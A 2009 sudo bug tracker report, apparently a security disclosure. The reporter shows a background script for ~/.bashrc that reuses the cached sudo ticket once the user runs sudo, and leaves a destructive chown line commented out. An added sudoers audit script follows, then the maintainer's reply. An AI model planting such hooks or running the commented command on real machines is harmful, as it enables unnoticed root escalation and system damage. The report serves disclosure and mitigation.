Bug 377

Summary: Timestamp exploit by programmatically launching another sudo command shortly after.
Product: Sudo
Reporter: Johannes Buchner <buchner.johannes>
Component: Sudo
Assignee: Todd C. Miller <Todd.Miller>
Status: RESOLVED INVALID
Severity: security
Priority: low
Version: 1.7.2
Hardware: PC
OS: Linux

Description Johannes Buchner 2009-12-01 06:07:01 MST
The timestamp capability of sudo, as shipped with Ubuntu by default, can be exploited to execute another command after the user starts his/her own command.

Consider appending the following script to ~/.bashrc: It waits for the user to launch a sudo-enhanced program. (This obviously also works if NOPASSWD is set for the user.)
# this exploits sudo's timeout capability by launching another command when
# the user did some sudo command shortly before.

MAXAGE=100

while sleep 10
do 
	pgrep -f -U 0 -P $PPID,$$ && {
		echo parent has a root owned child process
		id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
		# wait $id
		age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y')))
		if [ "$age" -lt "$MAXAGE" ]; then
			echo the child is young
			# launch next stage payload
			# sudo chown -x /bin/* /sbin/*
			sudo id
		fi
	}
done &
# 
Note that any program can reach root by waiting for the user to launch any sudo command.

Ideally, sudo (or PolicyKit) should be able to tell whether the command came from the keyboard, or a program. This, however, is not possible.
A workaround is to disable timestamps.

This might be related to http://www.sudo.ws/bugs/show_bug.cgi?id=357

What measures can be taken to mitigate this? Would you consider this a security bug, or the normal behaviour of sudo? What should distros/users do about it?
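The "disable timestamps" workaround mentioned above is controlled by the sudoers timestamp_timeout option; the following added example (not part of the bug report) audits a sudoers file for that setting and classifies the authentication window it leaves open. It assumes the documented sudoers semantics (0 = always prompt, negative = the ticket never expires, unset = compiled-in default) and uses constructed sample files rather than the real /etc/sudoers.

```shell
# Added example, not from the bug report: audit a sudoers file for the
# timestamp_timeout setting that the "disable timestamps" workaround relies on.
# Assumes sudoers semantics as documented for sudo: 0 = always prompt,
# negative = the ticket never expires, unset = compiled-in default.

# Print the timestamp_timeout (minutes) set by a Defaults line, or "default"
# when no line sets it. The last matching line wins, as in sudoers.
effective_timestamp_timeout() {
    val=$(sed -n 's/^[[:space:]]*Defaults[^#]*timestamp_timeout[[:space:]]*=[[:space:]]*\(-*[0-9][0-9.]*\).*/\1/p' "$1" | tail -n 1)
    if [ -n "$val" ]; then echo "$val"; else echo default; fi
}

# Describe the window a setting leaves open to a job started from the same shell.
timestamp_risk() {
    t=$(effective_timestamp_timeout "$1")
    case "$t" in
        0)       echo "disabled: every sudo command re-prompts for a password" ;;
        -*)      echo "never-expires: ticket stays valid until sudo -k" ;;
        default) echo "default: compiled-in timeout applies" ;;
        *)       echo "window: ticket valid for $t minutes after each sudo" ;;
    esac
}

# Constructed sample sudoers fragments (temporary files, not real system files).
WEAK=$(mktemp); STRICT=$(mktemp); UNSET=$(mktemp); FOREVER=$(mktemp)
cat > "$WEAK" <<'EOF'
Defaults    env_reset
Defaults    timestamp_timeout=15
%admin ALL=(ALL) ALL
EOF
cat > "$STRICT" <<'EOF'
Defaults    env_reset
# the report's workaround: no timestamp, so each command re-prompts
Defaults    timestamp_timeout=0
%admin ALL=(ALL) ALL
EOF
printf 'Defaults env_reset\n%%admin ALL=(ALL) ALL\n' > "$UNSET"
printf 'Defaults:alice timestamp_timeout=-1\n' > "$FOREVER"

for f in "$WEAK" "$STRICT" "$UNSET" "$FOREVER"; do
    timestamp_risk "$f"
done
```

Because the report's script fires while the user's own sudo command is still running, invalidating the ticket afterwards with `sudo -k` does not close that window; only a timeout of 0 makes the second invocation prompt again.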
Comment 1 Todd C. Miller 2009-12-08 10:27:53 MST
This is normal sudo behavior.  Sites that wish to disable the timestamps may do so.  The point of the timestamp file is to provide a middle ground between the convenience of using a root shell and the security of requiring a password for each root command.

If someone is able to write to your .bashrc your account is effectively compromised as it is possible to invoke a keylogger to read the password used for sudo (or anything else).  As such, I don't think this is a sudo-specific problem.